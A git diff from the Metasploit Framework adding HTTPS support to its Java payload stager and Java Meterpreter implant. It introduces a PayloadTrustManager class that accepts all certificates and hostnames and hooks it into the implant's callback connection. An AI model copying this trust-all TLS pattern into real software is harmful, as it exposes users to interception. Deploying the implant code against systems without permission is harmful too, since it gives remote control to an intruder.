diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index 505e83d70f..c8bc897506 100755 Binary files a/data/java/metasploit/Payload.class and b/data/java/metasploit/Payload.class differ diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar index a9583a5a90..45f2b4406f 100755 Binary files a/data/meterpreter/meterpreter.jar and b/data/meterpreter/meterpreter.jar differ diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java index 083d32c256..7afa376932 100644 --- a/external/source/javapayload/src/metasploit/Payload.java +++ b/external/source/javapayload/src/metasploit/Payload.java @@ -105,6 +105,9 @@ public class Payload extends ClassLoader { classFile.getParentFile().mkdirs(); // load ourselves via the class loader (works both on disk and from Jar) writeEmbeddedFile(clazz, clazzFile, classFile); + if(props.getProperty("URL", "").startsWith("https:")) { + writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class")); + } FileOutputStream fos = new FileOutputStream(propFile); props.store(fos, ""); fos.close(); diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java index 79cb3b5678..97377a1f0e 100644 --- a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java +++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java @@ -167,6 +167,15 @@ public class Meterpreter { TLVPacket request = null; try { URLConnection uc = url.openConnection(); + if (url.getProtocol().equals("https")) { + // load the trust manager via reflection, to avoid loading + // it when it is not needed (it requires Sun Java 1.4+) + try { + Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc}); + } catch (Exception ex) { + ex.printStackTrace(getErrorStream()); + } + } uc.setDoOutput(true); OutputStream out = uc.getOutputStream(); out.write(outPacket == null ? RECV : outPacket); diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java new file mode 100644 index 0000000000..d17fc46287 --- /dev/null +++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java @@ -0,0 +1,63 @@ +package com.metasploit.meterpreter; + +import java.net.URLConnection; + +import javax.net.ssl.HostnameVerifier; +import javax.net.ssl.HttpsURLConnection; +import javax.net.ssl.SSLContext; +import javax.net.ssl.SSLSession; +import javax.net.ssl.SSLSocketFactory; +import javax.net.ssl.TrustManager; +import javax.net.ssl.X509TrustManager; +import java.security.cert.X509Certificate; + +/** + * Trust manager used for HTTPS URL connection. This is in its own class because it + * depends on classes only present on Sun JRE 1.4+, and incorporating it into + * the main {@link Meterpreter} class would have made it impossible for other/older + * JREs to load it. + * + * This class is substantically identical to the metasploit.PayloadTrustManager class, + * only that it tries to cache the ssl context and trust manager between calls. + */ +public class PayloadTrustManager implements X509TrustManager, HostnameVerifier { + + public X509Certificate[] getAcceptedIssuers() { + // no preferred issuers + return new X509Certificate[0]; + } + + public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) { + // trust everyone + } + + public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) { + // trust everyone + } + + public boolean verify(String hostname, SSLSession session) { + // trust everyone + return true; + } + + private static PayloadTrustManager instance; + private static SSLSocketFactory factory; + + /** + * Called by the {@link Payload} class to modify the given + * {@link URLConnection} so that it uses this trust manager. + */ + public static synchronized void useFor(URLConnection uc) throws Exception { + if (uc instanceof HttpsURLConnection) { + HttpsURLConnection huc = ((HttpsURLConnection) uc); + if (instance == null) { + instance = new PayloadTrustManager(); + SSLContext sc = SSLContext.getInstance("SSL"); + sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom()); + factory = sc.getSocketFactory(); + } + huc.setSSLSocketFactory(factory); + huc.setHostnameVerifier(instance); + } + } +}